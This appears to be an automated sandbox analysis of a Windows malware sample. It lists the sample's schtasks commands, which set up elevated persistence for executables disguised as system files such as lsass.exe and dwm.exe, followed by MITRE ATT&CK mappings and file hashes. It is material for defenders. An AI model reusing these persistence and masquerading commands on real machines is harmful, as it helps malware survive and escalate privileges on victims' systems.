C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Services\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Services\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\123.0.6312.123\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\123.0.6312.123\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files\Google\Chrome\Application\123.0.6312.123\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Windows\it-IT\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Windows\it-IT\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 14 /tr "'C:\Windows\it-IT\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Templates\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default\Templates\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Templates\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\hyperBroker\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\hyperBroker\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\hyperBroker\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Downloads\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Downloads\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
1KB
MD54c8fa14eeeeda6fe76a08d14e08bf756
SHA130003b6798090ec74eb477bbed88e086f8552976
SHA2567ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5
SHA512116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD57f3c0ae41f0d9ae10a8985a2c327b8fb
SHA1d58622bf6b5071beacf3b35bb505bde2000983e3
SHA256519fceae4d0dd4d09edd1b81bcdfa8aeab4b59eee77a4cd4b6295ce8e591a900
SHA5128a8fd17eef071f86e672cba0d8fc2cfed6118aff816100b9d7c06eb96443c04c04bc5692259c8d7ecb1563e877921939c61726605af4f969e3f586f0913ed125
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
948B
MD51a58f982c18490e622e00d4eb75ace5a
SHA160c30527b74659ecf09089a5a7c02a1df9a71b65
SHA2564b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD544cc2ace0ab8f6d2b9451e69ca703395
SHA1197e9c479a75b47a0be7f62d531c530bda7eeced
SHA256511469e6c6fef21d43955983c65007dc53f4c90b76fd1729b7da04b9d25756ba
SHA51260f5e6659e02e6fab9a1ab1bce47a19cf19eec1edf8a874d4712bc655e5a2c2e16bfff35ef701d75f1f137cf7063ba1c5685db6dc73355ee0fec16f7aba65f9c
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
20KB
MD56abb2a3b7a002d7e7ef39e61708144de
SHA112e623fb4e6024da765886489da8d3f28e7fcfb0
SHA256002d9ba9a89b856381c6fb532bcb8d484814b427a8d71df6c0f9811d892eaf8e
SHA5120b135011c2892446b7ae4662d33b664747bc8a26abdc68e5f5d42c6871c65bdfa7ff194c30375b7cfac84936287f56f26b1c6b9379bdb4135135a029ac807187
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
260B
MD5e0e1c65c428c163250bf883fcc46e6e3
SHA105b41ec445df0d993a9b5ae7bb10e5e4af93396d
SHA2567c408c20ab10f8530f4945e5ca8e1b4e1b6e9ab31baf40810105ee870dd753d1
SHA512a15c218e4414127646212ba2a4232697442bf5f1b3237f6f8e61d1083dd39e00cfa28981b1074657fdb3ea4998c4450a5dea7be16c87b41e4795db59842b6fd4
-
Filesize
430KB
MD55a8236db622b68f7f0bf1601beed11b2
SHA14593a1e6b910a761beed1bfb51c4a4bc6d56e26c
SHA2560f82630b290c13d568dc25e81f9fb1b68e29d53ac582eeaec78b1ab7bb5fd1ae
SHA512f97c3103898dae7fe0cff281cf8b7b080ec097f53c35c4617a63577bcb56c2ea0b1591a41b1a2632aa81ccf3883e16cfbf08240152fa9b59f54c90a9585f06d6
-
Filesize
227KB
MD584c4d70a6de6f6a794b0e287ea519458
SHA197d25a2f209caa27a744b0efd281e401a94a87d4
SHA256fd86b4c8eb8469a5f88085f512d83afa7ef5bc637156db24e49669ffbc55b06f
SHA512f2411a0614813e1a33fa7e70923ef37cd840627ca6d6af348906ca72d8b8710c575ebcd996067200e7d8237ab537279fef720d33f4ff4cb3dca1ba52fa29ff21
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
777KB
MD5c753914461faaf452c641fb686ca004b
SHA1c7b16380f8bc9f9a24dc91f083ba2dadc8356a9d
SHA2565e794482cab6f03c7095ea2c768ea38283fa44e73520fee7d4ebb4ead424f469
SHA51280f1b9559b735e076b032e4c5743fd085cb6f75388e107806800eced745786188d7f170da9d6584f9f64d0bf4cada46e103b64082425b219d87080620bcefe91
-
Filesize
872KB
MD5678712506c4fb19070c35596abf0b94c
SHA10fbf492d44960c3faae711fe93ecdb05293f3d01
SHA2566c49fbaf56448928b2696373d509ed1f04785fc67818e4d7f4c9fe0cb406bb4c
SHA51280d27edcaab8250d79274e76a7b15cdc4dc65b5a2111bd7a4ec69e85f30ac4b7e08458175c62f016e78f8c9c82b504ef649572ca97359837bacb66204469d540
-
Filesize
199B
MD5d9a3310de3d94277776ea0acd4abbe4a
SHA11bfd2c62ce55e878752550f290178782c689fffc
SHA25690fae46ec0373999bb73f4a6b68ce15aa94969a73c1e10750942acabd6f4351c
SHA5125e15cdc4bd6cfb90d06e01a8a5e57bd2aef9eb70c300ea03443da191219a48b9214b316b473c3662916ed6a2c3cc00db46482b3f3d29dee900bf6c1905186ca3
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
1.3MB
MD57c24ff1412c417a43eba35bd3725b494
SHA14caefdba646a66e69a902fc55aacd75239003a48
SHA256296bc7bff55bd69da0bcd32e8d2c1adec4bc577a5518932f5f8249c53ac72d27
SHA51214c847789d7dda152d185df7086238df7cab92d2979dbede33a4acf7b5521fbbc09583bb0db2c524756e030b6c86935fc9f3681244be723cdb68cdeacbd83db2
-
Filesize
2KB
MD54028457913f9d08b06137643fe3e01bc
SHA1a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b
-
Filesize
34B
MD5af79a4948d935e336e16f5da6d47b37a
SHA1ea68408dd0f21436cad2a3fe2a2bf8d86b0b86d1
SHA25657eca70c318a217c78ded3d84f9d0024885e30fe0f5d5255bf17920ff7347929
SHA512e6670e40ac425c751dd60c353cc9ce7988a35c90d0b51b85d07d2e2c7c9d59268c41596c13f40e94568ccb1e35860f2b3c0bc6f47b3774215c4324286e864d16
-
Filesize
217B
MD539187c6903e4dc4e96b59be360916231
SHA154f8e68c5eac3f194026251cea74e9dbdbdcc13e
SHA25610ac6b1e5488926c810d0bc22be17081bb6a272fee155542217e7223eecc6fd8
SHA512a59a6b566b8ffa8e498a78428f95575c54cca09239933dbe88db4c51f5d57cb47c4ec772decf35425f4fe4b4ebe8c5af96de348e7eb5d44284c1a37697cfb297
-
Filesize
998KB
MD57499358db6b8c37ca4b79d8a4adb6166
SHA17568e7dd876f09be4d71d1e57d8a6c56f35ab40c
SHA25638b3eabe4caf5b79ddb04c7148918c8721e79a4052f1461f27fc87753794eba3
SHA5126893966d24892227d07f45e9115f8997cc561f0815752af1d3266534a2af08e840b404715944f6b8dea0d167ea342223d054b468ac080ebf6314d59c9d845d33
-
Filesize
1.2MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
472KB
-
Filesize
320KB
-
Filesize
120KB
-
Filesize
256KB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
1024KB
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
800KB
-
Filesize
896KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
